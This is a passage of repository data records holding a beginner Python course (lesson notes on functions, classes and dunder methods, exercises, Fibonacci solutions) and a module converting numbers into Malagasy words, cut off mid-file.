len(self.values)==0:\n return True\n else:\n return False\n def __len__(self):\n return len(self.values)\n def __str__(self):\n return f\"[ {' '.join(self.values)} ]\"\n def __eq__(self,other):\n if type(other)==type(self):\n return self.values==other.values\n raise Exception(\"other type is not stack\")\n\nif __name__ == '__main__':\n s=stack()\n s.push(1)\n s.push(4)\n s.push(6)\n s.push(\"kasra\")\n s.push(\"hellllo\")\n print(s.pop())\n print(s.lastItem())\n print(s.pop())\n print(s.pop())\n print(s.lastItem())\n print(s.pop())\n print(s.pop())\n print(s.pop())\n print(s.pop())\n print(s.lastItem())\n print(s.pop())\n print(s.pop())\n \n" }, { "alpha_fraction": 0.7254518866539001, "alphanum_fraction": 0.7454811930656433, "avg_line_length": 35.53571319580078, "blob_id": "67d59c52838b454a09b669b36e86792f11ccc1dd", "content_id": "4223ab6544284cd5522d4caa8621f5e1ef298b84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2047, "license_type": "no_license", "max_line_length": 132, "num_lines": 56, "path": "/Session0/session0.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# First Session\n\n## Why python?\n\n1. First and formost ython is FREE.\n2. Python is light ( matlab is about 10-15GB, java ~ 300-500MB, C# ~ 7-8GB, ...).\n3. As python is scripting language it can run on any platform.\n4. Python's data structure are sutable for machine learning and modern programmings.\n5. Python's community is vast.\n6. Python's extending and package manager is very good\n\n## Download and install python\n\n***if your operating system is windows*** then visit [here](python.org) to download your file.\n**dont forget to tick the `add to PATH`**\n\nTo verify your installation open CMD and type `python`, if you where able to see the REPL, then be proud of yourself... :)\n\n***if your operating system is UNIX*** then you might have python already \n> any way to install python u must run `sudo apt install python3` (for debian base distros ONLY)\n\nto verify your posetion of python simply run `python3` in terminal and u will see REPL\n\n***if your operating system is MAC*** \n:|\nCHANGE YOUR OS :|\n\n## Coding environment\n\nto choose a comfortable environment you have several chices:\n1. python's default IDLE(only available at windows):\n if u have installed python u can access this in your start \n myScoreForThisoption: 4/10\n2. pycharm IDLE: \n as we know pycharm is NOT free(and this a big reason to run away...)\n any way if you decide to install pycharm you may face a big load on your RAM, you may face some problems while installing packages\n myScoreForThisoption: 2/10\n3. Vscode + python3 interpreter\n Vscode is a TextEditor, which is available at [here](https://code.visualstudio.com/download)\n you can edit yot text and then run it using python interpreter\n or simpler way is too install pythonPackage in Vscode\n myScoreForThisoption: 8/10\n4. Atom + python3 interpreter\n Atom is another textEditor using WIDE range of amazing tools *__*\n myScoreForThisoption: 11/10\n \n## Start programming \n\n** yesss lets start programming **\n\n### Variables\n Variables are non-type in python\n you dont need to define thier type\n `a=45` \n\n### \n" }, { "alpha_fraction": 0.6440678238868713, "alphanum_fraction": 0.6847457885742188, "avg_line_length": 21.69230842590332, "blob_id": "1b6ce7ef3474eb86c11635382416ce56a389bf4a", "content_id": "ff4632cc9de0ba07215178a9d905b5375ac9b34a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 85, "num_lines": 13, "path": "/Session7/ans.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class human:\n name=None\n def __init__(self):\n print(\"i am new born!!\")\n def sayHello(self):\n print(f\"hello ma friend :)\\nMy name is {self.name} I am very polit \\U0001F60C\\n\")\n\nperson0=human()\nperson0.name=\"kasra\"\nperson0.sayHello()\nperson1=human()\nperson1.sayHello()\nperson0.sayHello()\n" }, { "alpha_fraction": 0.6951102614402771, "alphanum_fraction": 0.7516778707504272, "avg_line_length": 29.676469802856445, "blob_id": "8b9126b1ad929e52fa29244a72dde78d8e45c0df", "content_id": "f7178c296cc1979729e389dbc0d6fd5ece085514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1046, "license_type": "no_license", "max_line_length": 115, "num_lines": 34, "path": "/Session7/fastFib/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "> this is a answer to question which mentioned in lesson\n\n\n# Question\n think a pile of numbers that we should check whether they are in the Fibonacci series or not.\n- **fisrt** most of numbers are duplicated\n- **second** make it *fast*\n\n> try to solve it by your own before looking at the answers\n\n## Files Description\n- `fastFib.py` is **the main answer**(your answers are welcomed if you can make it faster 😉)\n- also I solved this question using a *regular* method and not taking care of time which is in the `regularFib.py`.\n- `speedChecker.py` simply examines the other codes speed\n\n## Sample Output\n```\ngenerating numbers...\nnumbers generated...\n\tbiggest number generated: 121918\n\tsmallest number generated:121053\nnumbers counted...\nmaking the graph...\nqt5ct: using qt5ct plugin\n...\ntime elapsed for fast fib is 2.676896810531616\ntime elapsed for fast fib is 16.891290426254272\n\tNOTE: all answers match\nnumber of matched items: 20818\nnumber of unmatched items: 9979182\n```\n\n![](./numbers_destribution.png)\n![](./answers_destribution.png)\n" }, { "alpha_fraction": 0.5356707572937012, "alphanum_fraction": 0.5865853428840637, "avg_line_length": 13.513274192810059, "blob_id": "2456fa16bded97b74efaaf50dc84109aba5476de", "content_id": "a251da37d40b006cc1acd2c97b01f307469f845a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3280, "license_type": "no_license", "max_line_length": 91, "num_lines": 226, "path": "/Session3/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Unpacking lists\n\n```python\n>>> a,b=[1,3]\n>>> a\n1\n>>> b\n3\n>>> print(a,b)\n1 3\n>>> a,b=[1,2,3]\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nValueError: too many values to unpack (expected 2)\n>>> a,b,c=[1,2,3]\n>>> print(a,b,c)\n1 2 3\n>>> a,*b=[1,2,3]\n>>> print(a,b)\n1 [2, 3]\n>>> a,*b,c=[1,2,3,4,5,6]\n>>> print(a,b,c)\n1 [2, 3, 4, 5] 6\n```\n\n# defining functions\n\n#### why we need to define new functions ?\n1. Re-usability\n2. Easier to understand\n3. Recursive functions\n4. Abstraction\n5. Team work\n6. Making iterators\n\n```python\ndef <function_name>(<arguments>):\n #\n # function body\n #\n return <output>\n```\n\n**example:** Adder\n```python\ndef adder(a,b):\n return a+b\n```\n\n**example:** XOR two lists\n```python\ndef XOR(list0,list1):\n answer=[]\n for i,j in zip(list0,list1):\n answer.append(i^j)\n return answer\n```\n\n*or...*\n\n```python\ndef XOR(list0,list1):\n return [i^j for i in zip(list0,list1)]\n```\n\n**example:** Absolute value\n```python\ndef absoluteVal(x):\n if x<0:\n x*=-1\n return x\n```\n\n**example:** Fibonacci series\n\n```python\ndef fib(n):\n if n==1 or n==2:\n return 1\n a=1\n b=1\n for i in range(n-2):\n b=a+b\n a=b-a\n return b\n```\n*or...*\n\n```python\ndef fib(n):\n if n==1 or n==2:\n return 1\n a,b=1,1\n for i in range(n-2):\n a,b=b,a+b\n return b\n```\n\n# Variable scope\n\n```python\ndef boo():\n m=3\n\ndef foo(n):\n m=1\n boo()\n print(n,m)\n n=10\n\nm=2\nn=0\nfoo(3)\nprint(n,m)\n```\n\n# Passing arguments\n\n#### Define a default value for a specific variable\n```python\ndef log(num,base=10):\n UPBOUND=10**5\n sum0=0\n k=1\n xn=num-1\n for i in range(1,UPBOUND):\n sum0+=k*xn/i\n k*=-1\n xn*=(num-1)\n sum1=0\n k=1\n xn=base-1\n for i in range(1,UPBOUND):\n sum1+=k*nx/i\n k*=-1\n xn*=base-1\n return sum0/sum1\n\n\nprint(log(20))\nprint(log(100))\nprint(log(64,2))\nprint(log(729,base=2))\n```\n#### Passing multiple arguments as a list\n\n```python\ndef f(*numbers):\n k=1\n s=0\n for i in numbers:\n s+=k*i\n k*=-1\n return s\n\n\nprint(f(1,2,3)) # 1-2+3 = 2\nprint(f(4,5,8,9,10,4)) # 4-5+8-9+10-4 = 4\nprint(f(8,3,2)) # 8-3+2 = 7\n```\n\n**using asterisks while calling function**\n\n```python\ndef curveGenerator(a,b,c,xStart,xEnd,step):\n ''' returns a list containing f(x) values which starts from xStart and end until xEnd\n WHERE:\n f(x) = ax^2+bx+c\n '''\n ans=[]\n x=xStart\n while x<=xEnd: # Line A\n ans.append(a*x**2+b*x+c)\n x+=step\n return ans\n\nprint(curveGenerator(*[1,0,0,-2,2,0.01]))\n```\n**QUESTION**: why `for i in range(xStart,xEnd,step)` is not used instead of line A ???\n\n#### Passing multiple arguments as a dictionary\n\n```python\ndef add_to_db(**details):\n print(details)\n # do other stuffs\n\nadd_to_db(name='kasra',age=22,degree='Bachelor')\n```\n\n# Recursive functions\n\n**example:** power\n\n```python\ndef pow(base,power):\n if power==1:\n return base\n return base*pow(base,power-1)\n```\n\n**example:** again Fibonacci\n```python\ndef fib(n):\n if n<=2:\n return 1\n return fib(n-1)+fib(n-2)\n```\n\n*or...*\n\n```python\ndef fib(n):\n return ([1,1]+[fib(i) for i in range(2,n)]+[fib(n-1)+fib(n-2) for _ in [1] if n>=2])[n]\n```\n\n*or lets make it faster...*\n\n```python\ndef fib(n,series=[1,1]):\n if len(series)>=n:\n return series\n series=fib(n-1,series)\n series.append(series[-1]+series[-2])\n return series\n```\n" }, { "alpha_fraction": 0.46485820412635803, "alphanum_fraction": 0.4858199656009674, "avg_line_length": 16.255319595336914, "blob_id": "d09b7792d80acaed86921fc47c4128b71f6cb724", "content_id": "b01c6e619bbda94f2b3f20cf90f3cee09b9e1370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 811, "license_type": "no_license", "max_line_length": 36, "num_lines": 47, "path": "/Session7/Q0.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class iterator:\n def __init__(self):\n self.lst=[]\n self.n=0\n def add(self,lst):\n self.lst+=lst\n def next(self):\n if self.n==len(self.lst):\n return None\n self.n=0\n ans=self.lst[self.n]\n self.n+=1\n # return self.lst.pop(0)\n return ans\n\na=iterator()\nb=iterator()\n\nb.add([6,9,1])\nprint(a.add([3,4,5]))\nprint(b)\nprint(a.next())\nprint(a.next())\nprint(a.next())\nprint(a.next())\nprint(b.next())\nprint(b.next())\nprint(b.next())\n\n# class iterator:\n# def __init__(self):\n# self.lst=[]\n# def next(self,lst=[])\n# self.lst+=lst\n# if lst==[]:\n# return self.lst.pop(0)\n# else:\n# return None\n#\n#\n# a=iterator()\n# b=iterbtor()\n#\n# b.next([6,9,1])\n# a.next([3,4,5])\n#\n# a.next()\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.5921052694320679, "avg_line_length": 29.399999618530273, "blob_id": "9074aae3e6f620d4f080bc223c2b04e356793f71", "content_id": "ccaf429d9018b03286c46f4f92b69ce1f8bebe34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 304, "license_type": "no_license", "max_line_length": 59, "num_lines": 10, "path": "/Session9/Q1.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "def loop_size(node):\n visited_nodes={node:0}\n last_node=node\n while 1:\n new_node=last_node.next\n tmp=visited_nodes.get(new_node,-1)\n if tmp!=-1:\n return len(visited_nodes)-tmp\n visited_nodes.update({new_node:len(visited_nodes)})\n last_node=new_node\n" }, { "alpha_fraction": 0.649350643157959, "alphanum_fraction": 0.6806156635284424, "avg_line_length": 24.66666603088379, "blob_id": "70a7d5408af09fce816ae9ed691537c83384fa3c", "content_id": "1b0a36bb0b87e26985f42654af73df927c61f601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2079, "license_type": "no_license", "max_line_length": 185, "num_lines": 81, "path": "/Session2/questions.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# QUESTION0\nBob's space button is broken and is misbihaving which inserts several space characters instead of one. Write a program to help him for this problem.\n\n**input** is a string containing several consecutive spaces.\n\n**output** Replace this spaces with one single space. Also omit any extra space at the end or start of the string.\n\n#### input0\n```\nHello my name is Bob.\n```\n#### output0\n```\nHello my name is Bob.\n```\n# Question1\nBob wants to know all file extensions used in his computer, hence he has prepared a list containing all of files in his computer. Now help him to find all extensions and print them out.\n\n**input** is a file names (each name in a single line and the last line is empty)\n\n**output** print all extensions:\n- extensions must not be duplicated\n- sort them in alphabetic order\n- seperate each item with `--`\n\n#### input0\n> tmp.txt\n>\n> download.jpeg\n>\n> project.DB.first.exe\n>\n\n#### output0\n> txt -- jpeg -- exe\n\n# Question2\nrecently, Bob has studied about ([Hamming distance](https://en.wikipedia.org/wiki/Hamming_distance).\nnow he invented new distance named Bob distance which works like this:\n- check whether two strings has same length or not. answer `-1` if they are not same lenght\n- find two strings differences\n- sum all indexes which are different (indexes starts from 1)\n\n*input* is two strings\n\n*output* is a single number showing Bob distance\n\n#### input0\n1000111011\\\n1000011110\n\n#### output0\n23\n\n>10+8+5\n\n# Question3\nBob could send an essay about his *'Bob distance'* to ISI.\nnow he wants to update his coding by changing the indexes:\n **number the index as increasing power of two and sum this new numbers**\n\n#### input0\nkasraaaa\\\njasrraae\n\n#### output0\n145\n\n<table>\n <tr>\n <td>k</td><td>a</td><td>s</td><td>r</td><td>a</td><td>a</td><td>a</td><td>a</td>\n </tr>\n <tr>\n <td>j</td><td>a</td><td>s</td><td>r</td><td>r</td><td>a</td><td>a</td><td>e</td>\n </tr>\n <tr>\n <td><b>1</b></td><td>2</td><td>4</td><td>8</td><td><b>16</b></td><td>32</td><td>64</td><td><b>128</b></td>\n\n </tr>\n</table>\n`1+16+128=145`\n" }, { "alpha_fraction": 0.5801835656166077, "alphanum_fraction": 0.5885528922080994, "avg_line_length": 21.585365295410156, "blob_id": "f2952ba914f6e923041c72c1bffe313f4516ee31", "content_id": "409c84a851478a9838df2337dbf9ae9d1ba3378f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3706, "license_type": "no_license", "max_line_length": 222, "num_lines": 164, "path": "/Session7/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Class (part1)\n\n\nPython is an object oriented programming language.\n\nAlmost everything in Python is an object, with its properties and methods.\n\n**What is a class?**\n\nObjects are an encapsulation of variables and functions into a single entity\n\n```python\nclass human:\n name=None\n```\n\n## Instantiating\n```python\nclass human:\n name=None\n\nperson0=human()\nperson0.name='kasra'\n```\n## Adding Functions:\n```Python\nclass human:\n name=None\n def sayHello(self):\n print(f\"hello ma friend :)\\nMy name is {self.name} I am very polit \\U0001F60C\\n\")\n\nperson0=human()\nperson0.name='kasra'\nperson0.sayHello()\n```\n\n## \\_\\_init__ function\n```Python\nclass human:\n name=None\n def __init__(self):\n print(\"i am new born!!\")\n def sayHello(self):\n print(f\"hello ma friend :)\\nMy name is {self.name} I am very polit \\U0001F60C\\n\")\n\nperson0=human()\nprint(\"name changed!\")\nperson0.name='kasra'\nperson0.sayHello()\n```\n\n**Question:** write a function to change the `name`\n\n**init function can have arguments...**\n\n```Python\nclass human:\n name=None\n def __init__(self,name):\n print(\"i am new born!!\")\n self.name=name\n def sayHello(self):\n print(f\"hello ma friend :)\\nMy name is {self.name} I am very polit \\U0001F60C\\n\")\n\nperson0=human('kasra')\nperson0.sayHello()\n```\n\n**Try to make several objects from one function and see the variables namespace**\n\n**Question:** Create a class, in which it has this functionallities:\n- this class can be Instantiate by a list\n- make a method , whenever the method is called it should return next object\n\n**Question** think a pile of numbers that we should check whether they are in the Fibonacci series or not.(**fisrt** most of numbers are duplicated, **second** make it *fast*)\n\n## Magic Functions or Dunder Functions\n\n[docs for special functions](https://docs.python.org/3/reference/datamodel.html#special-method-names)\n\n- `__lt__(self, other)`\n\n- `__le__(self, other)`\n\n- `__eq__(self, other)`\n\n- `__ne__(self, other)`\n\n- `__gt__(self, other)`\n\n- `__ge__(self, other)`\n\n****\n\n\n- `__getitem__(self, key)`\n\n- `__setitem__(self, key, value)`\n\n- `__contains__(self, item)`\n\n****\n\n- `__add__(self, other)` ==> `+`\n\n- `__sub__(self, other)` ==> `-`\n\n- `__mul__(self, other)` ==> `*`\n\n- `__matmul__(self, other)` ==> `@ `\n\n> [ptyhonDoc](https://docs.python.org/3/reference/expressions.html#binary-arithmetic-operations) says `The @ (at) operator is intended to be used for matrix multiplication. No builtin Python types implement this operator.`\n\n- `__truediv__(self, other)` ==> `/`\n\n- `__floordiv__(self, other)` ==> `//`\n\n- `__mod__(self, other)` ==> `%`\n\n- `__pow__(self, other[, modulo])` ==> `**`\n\n- `__lshift__(self, other)` ==> `<<`\n\n- `__rshift__(self, other)` ==> `>>`\n\n- `__and__(self, other)` ==> `&`\n\n- `__xor__(self, other)¶` ==> `^`\n\n- `__or__(self, other)` ==> `|`\n\n- `__radd__(self, other)`\n- `__rsub__(self, other)`\n- `__rmul__(self, other)`\n- `__rmatmul__(self, other)`\n- `__rtruediv__(self, other)`\n- `__rfloordiv__(self, other)`\n- `__rmod__(self, other)`\n- `__rpow__(self, other)`\n- `__rlshift__(self, other)`\n- `__rrshift__(self, other)`\n- `__rand__(self, other)`\n- `__rxor__(self, other)`\n- `__ror__(self, other)¶`\n\n- `__iadd__(self, other)` ==> `+=`\n- `__isub__(self, other)` ==> `-=`\n- `__imul__(self, other)` ==> `*= `\n- `__imatmul__(self, other)` ==> `@=`\n- `__itruediv__(self, other)` ==> `/=`\n- `__ifloordiv__(self, other)` ==> `//=`\n- `__imod__(self, other)` ==> `%=`\n- `__ipow__(self, other[, modulo])` ==> `**=`\n- `__ilshift__(self, other)` ==> `<<=`\n- `__irshift__(self, other)` ==> `>>=`\n- `__iand__(self, other)` ==> `&=`\n- `__ixor__(self, other)` ==> `^=`\n- `__ior__(self, other)` ==> `|=`\n\n****\n\n- `__str__(self)`\n\n- `__len__(self)`\n" } ]
23
YosofBadr/HackMed
https://github.com/YosofBadr/HackMed
154d9aadf67e50529eac9ce9d6d1e358dd097a9c
b70d2227208a5aac1514931a1cc73ce137f25737
0dfee729e58ee9025c9b471998a48a7b01b36590
refs/heads/master
2021-03-30T23:26:58.798748
2018-03-11T13:38:18
2018-03-11T13:38:18
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6809067130088806, "alphanum_fraction": 0.6918047070503235, "avg_line_length": 47.26881790161133, "blob_id": "d9fc5edfd74b3cac0bbcb0aa72927927d61baf4b", "content_id": "ab72f0763fa276ed6b95cc33eb823204404d76f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4588, "license_type": "no_license", "max_line_length": 102, "num_lines": 93, "path": "/quizfunctions.py", "repo_name": "YosofBadr/HackMed", "src_encoding": "UTF-8", "text": "import time #import shizzle for the program to work\r\nimport random\r\n\r\n\r\ndef question(MedTypeQ,AskQuestion): #Checks whether to display a medical question or reaction question\r\n if (MedTypeQ==True): #Chooses to display a medical question\r\n MedQuestion()\r\n elif (MedTypeQ==False): #Chooses to display a reaction question\r\n ReactionQuestion(\"Please tap when the tile turns from blue to white\")\r\n \r\n\r\ndef MedQuestion(): #Displays a medical question\r\n MedQBool=True\r\n ReactionQBool=False\r\n \r\n specifyKey=random.sample(list(MedicalQ),1) #Selects a random question from the dictionary\r\n print(specifyKey[0]) #Prints out the selected question\r\n \r\ndef ReactionQuestion(Reactquestion): #Displays a reaction question\r\n ReactQBool=True\r\n MedQBool=False #Tells the program that the question being asked is reaction\r\n \r\n print (Reactquestion) #In this function, tells the user the instruction\r\n time.sleep((randint(2,5))) #Makes the white tile appear randomly, sometimes its 2 seconds...\r\n #sometimes it can be 5 seconds instead, or any seconds between 2 and 5\r\n \r\n print(\"Tap now!\") #Tells the user to tap!\r\n isTileWhite=True #Set to true to signify to the program that the tile is now white\r\n \r\n \r\ndef clickP1(userAnswer): #When Player 1 clicks on button, it comes to this function\r\n if (ReactQBool==True and isTileWhite==True): #If Reaction Q=T, then the only way..\r\n #the question condition can be fulfilled is if the tile was true when the player..\r\n #clicked\r\n player1_score +=1\r\n elif (ReactQBool==True and isTileWhite==False): #Player clicked too early\r\n player1_score -=1\r\n elif (MedQBool==True and userAnswer==(MedicalQ.get(specifyKey[0]))):\r\n player1_score +=1 #Checks the user answer against the actual correct answer\r\n elif (MedQBool==True and userAnswer!=(MedicalQ.get(specifyKey[0]))):\r\n player1_score -=1 #If the answer is incorrect, score is deducted by 1\r\n \r\ndef clickP2(userAnswer): #When Player 2 clicks on button, it comes to this function\r\n if (ReactQBool==True and isTileWhite==True):\r\n player2_score +=1\r\n elif (ReactQBool==True and isTileWhite==False):\r\n player2_score -=1\r\n elif (MedQBool==True and userAnswer==(MedicalQ.get(specifyKey[0]))):\r\n player2_score +=1\r\n elif (MedQBool==True and userAnswer!=(MedicalQ.get(specifyKey[0]))):\r\n player2_score -=1\r\n \r\n\r\n#Program is set to flow in the following order:\r\n #1) Question function is called, for it to decide whether to run...\r\n #a reaction-type question or a medical-type question\r\n \r\n #2) Depending on the choice, one of the respective functions is run\r\n \r\n #3) In the respective function, it sets some booleans to true and some to false...\r\n #This is to signify to the program that the question has been displayed\r\n #This helps the program to differentiate between if player clicked early or not\r\n #i.e. (if player clicks on time, that means question boolean was true as it executed)\r\n #however, program detects the player as clicking early if boolean was set to false..\r\n #while they were clicking\r\n \r\n #4) IF the Question has been executed AND the conditions for the question is fulfilled...\r\n #then the player gets a point! If they selected a wrong answer, score - 1\r\n \r\n #5) Then you just loop as many times as you want for your questions\r\n \r\n \r\nplayer1_score=0 #Stores score of player 1\r\nplayer2_score=0; #Stores score of player 2\r\nAskQuestion=\"\" #Declares question variable\r\nMedQBool=False #Set to false because a medical question has not been asked yet\r\nReactQBool=False #Set to false because a reaction question has not been asked yet\r\n\r\nMedTypeQ=False #Declares MedType as false\r\n#This boolean variable is used to understand if the question to be asked is a...\r\n#Reaction question or a medical question\r\n\r\nMedicalQ={\"What is love\":\"Baby don't hurt me\",\"But Wait there's more\":\"hey!\",\"third time!\":\"go go\"}\r\n#A dictionary holding question and answer pairs, so its Question1:Answer1, Question2:Answer2\r\nspecifyKey=\"\" #Variable used to hold the answer for validation later\r\n\r\nisTileWhite=False #Checks whether the tile in Reaction questions has been set to white yet\r\n#This is to verify if the player have clicked before its turned true/tile turned white\r\n#Hence, allowing the program to deduct a score of 1 from the offending player\r\n\r\n\r\n\r\nquestion(True,MedicalQ)\r\n\r\n\r\n\r\n" } ]
1
srinivasan-l/PythonTraining2
https://github.com/srinivasan-l/PythonTraining2
c1de9c88277f743625d60c78648b9c176596d251
8d5cbc7664941e2cb69a142830449cb4b5cc5a61
7af1d665c8e54e142cb754e467e20f2a2a3bb1ad
refs/heads/master
2020-03-16T21:07:19.657229
2018-05-11T03:42:46
2018-05-11T03:42:46
132,985,559
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5564236044883728, "alphanum_fraction": 0.5642361044883728, "avg_line_length": 22.040000915527344, "blob_id": "cd9bdafad2489012c0c905dbddcc90617e3a14ef", "content_id": "5fffd6213e3c20fc9be92934a34ab9a3867773fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1152, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/myetree.py", "repo_name": "srinivasan-l/PythonTraining2", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"Process an XML document with elementtree.\n\nShow the document tree.\n\nUsage:\n python elementtree_walk.py [options] infilename\n\"\"\"\n\nimport sys\nfrom xml.etree import ElementTree as etree\n\ndef show_tree(doc):\n root = doc.getroot()\n show_node(root, 0)\n\ndef show_node(node, level):\n show_level(level)\n print 'tag: %s' % (node.tag, )\n for key, value in node.attrib.iteritems():\n show_level(level + 1)\n print '- attribute -- name: %s value: \"%s\"' % (key, value, )\n if node.text:\n text = node.text.strip()\n show_level(level + 1)\n print '- text: \"%s\"' % (node.text, )\n if node.tail:\n tail = node.tail.strip()\n show_level(level + 1)\n print '- tail: \"%s\"' % (tail, )\n for child in node.getchildren():\n show_node(child, level + 1)\n\ndef show_level(level):\n for x in range(level):\n print ' ',\n\ndef test():\n args = sys.argv[1:]\n if len(args) != 1:\n print __doc__\n sys.exit(1)\n docname = args[0]\n doc = etree.parse(docname)\n show_tree(doc)\n\nif __name__ == '__main__':\n #import pdb; pdb.set_trace()\n test()\n" } ]
1
hzrandd/socketqueue
https://github.com/hzrandd/socketqueue
71e4f3957fe7ffaaaa1c77be6567a2874cf7d4da
cf2a7bc807f25d55e5ccb000a273ff586a31176d
c7c1f0d3d0861e1a334e58f940fd32c2f30b0395
refs/heads/master
2021-01-18T09:29:50.628772
2012-11-10T11:38:37
2012-11-10T11:38:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 25, "blob_id": "2d48b3783510935862f2d96b996e8f31d100f99b", "content_id": "1f63b4c400c9f111cbcd335690e9f72e2f21ed59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26, "license_type": "no_license", "max_line_length": 25, "num_lines": 1, "path": "/__init__.py", "repo_name": "hzrandd/socketqueue", "src_encoding": "UTF-8", "text": "from socketqueue import *\n" } ]
1
sfrajaona/number2malagasy
https://github.com/sfrajaona/number2malagasy
8d695ab152c4aab340b21cfa50632dfdea0b8f9e
1d7fd18e94e873f0596be6d574a9028f075b1ff8
ee5d966c012616999d7d076113def0f093647378
refs/heads/master
2020-05-31T20:13:38.076099
2019-06-05T21:33:02
2019-06-05T21:33:02
190,471,554
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5282312631607056, "alphanum_fraction": 0.5467687249183655, "avg_line_length": 41.30215835571289, "blob_id": "0672ee6d811308430c06a176140a8b1c7871fedb", "content_id": "55c1043c23227740533e721d2a38a57fc03d01fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5880, "license_type": "no_license", "max_line_length": 100, "num_lines": 139, "path": "/number2malagasy/main.py", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "\"\"\"\nconvert a number into Malagasy phrase\nconvertit un nombre en Malgache\nmandika ny isa ho lasa soratra amin'ny teny Malagasy\nTODO : - numbers above 9 999 999\n - write tests\n - isa misy faingo\n\"\"\"\nDIGIT_NAME = {'1':'iray', '2':'roa', '3':'telo', '4':'efatra', '5':'dimy',\n '6':'enina', '7':'fito', '8':'valo', '9':'sivy', '0':'aotra'}\nPOWER_OF_TEN = ['amby', 'folo', 'zato', 'arivo', 'alina', 'hetsy', 'tapitrisa']\nDICT_COMBINATION = ({\n ('aotra', 'folo'):\"\", ('iray', 'folo'):'folo',\n ('roa', 'folo'):'roapolo', ('telo', 'folo'):'telopolo',\n ('efatra', 'folo'):'efapolo', ('dimy', 'folo'):'dimapolo',\n ('enina', 'folo'):'enimpolo', ('fito', 'folo'):'fitopolo',\n ('valo', 'folo'):'valopolo', ('sivy', 'folo'):'sivy folo'\n})\nDICT_COMBINATION.update({\n ('aotra', 'zato'):\"\", ('iray', 'zato'):'zato',\n ('roa', 'zato'):'roanjato', ('telo', 'zato'):'telonjato',\n ('efatra', 'zato'):'efajato', ('dimy', 'zato'):'dimanjato',\n ('enina', 'zato'):'eninjato', ('fito', 'zato'):'fitonjato',\n ('valo', 'zato'):'valonjato', ('sivy', 'zato'):'sivinjato'\n})\n\ndef link(word1, word2):\n \"\"\"\n manambatra ny isa sy ny tafolo miaraka aminy\n e.g link('telo', 'zato') --> 'telonjato'\n \"\"\"\n if word1 == 'aotra':\n return ''\n elif word2 == 'amby':\n return word1\n elif (word1, word2) in DICT_COMBINATION:\n return DICT_COMBINATION[word1, word2]\n elif word1 == 'iray' and word2 in ['zato', 'arivo']:\n return word2\n else:\n return word1 + ' ' + word2\n\ndef digit_to_word(number):\n \"\"\"\n convert each digit into the corresponding word\n e.g 291 --> ['roanjato', 'sivy folo', 'iray']\n \"\"\"\n converted = []\n digits = list(str(number)) # oh: 291 --> ['2', '9', '1']\n digits.reverse()\n for i in range(len(digits)):\n digit = digits[i]\n converted += [link(DIGIT_NAME[digit], POWER_OF_TEN[i])]\n return converted\n\ndef combine(digit_words):\n \"\"\"\n combines each digit word into a phrase (RECURSIVELY)\n examples:\n combine(['roa arivo', 'aotra', 'aotra', 'roa']) -> 'roa amby roa arivo' (not 'roa sy roa arivo')\n combine(['roanjato', 'aotra', 'roa']) -> 'roa amby roanjato' (not 'roa sy roa arivo')\n combine(['roanjato', 'roapolo', 'aotra']) -> 'roapolo sy roanjato' (not 'roapolo amby roanjato')\n exceptions:\n 'sy zato' -> 'amby zato'\n 'amby sy x arivo' -> 'amby x arivo' (e.g taona roa amby roa arivo) (when len(digit_words) == 4)\n \"\"\"\n if len(digit_words) == 1:\n phrase = digit_words[0]\n elif len(digit_words) == 2:\n phrase = ''\n if digit_words[0] != '':\n phrase = digit_words[0] + ' amby ' + combine(digit_words[1:])\n else:\n phrase = combine(digit_words[1:])\n return phrase\n elif len(digit_words) > 2:\n if digit_words[-1] != '':\n if not all(p == '' for p in digit_words[1:-1]):\n phrase = combine(digit_words[:-1]) + ' sy ' + digit_words[-1]\n elif all(p == '' for p in digit_words[1:-1]):\n phrase = combine(digit_words[:-1]) + digit_words[-1]\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) == 4:\n phrase = combine(digit_words[:-1]) + digit_words[-1]\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) > 4:\n phrase = combine(digit_words[:-1]) + ' sy ' + digit_words[-1]\n elif digit_words[-1] == '':\n phrase = combine(digit_words[:-1])\n phrase = phrase.replace(' ', ' ')\n phrase = phrase.replace('sy zato', 'amby zato')\n phrase = phrase.replace('iray amby', 'iraika amby')\n return phrase\n\ndef combine_reverse(digit_words):\n \"\"\"\n combines each digit word into a phrase (RECURSIVELY) \n examples:\n combine(['roa arivo', 'aotra', 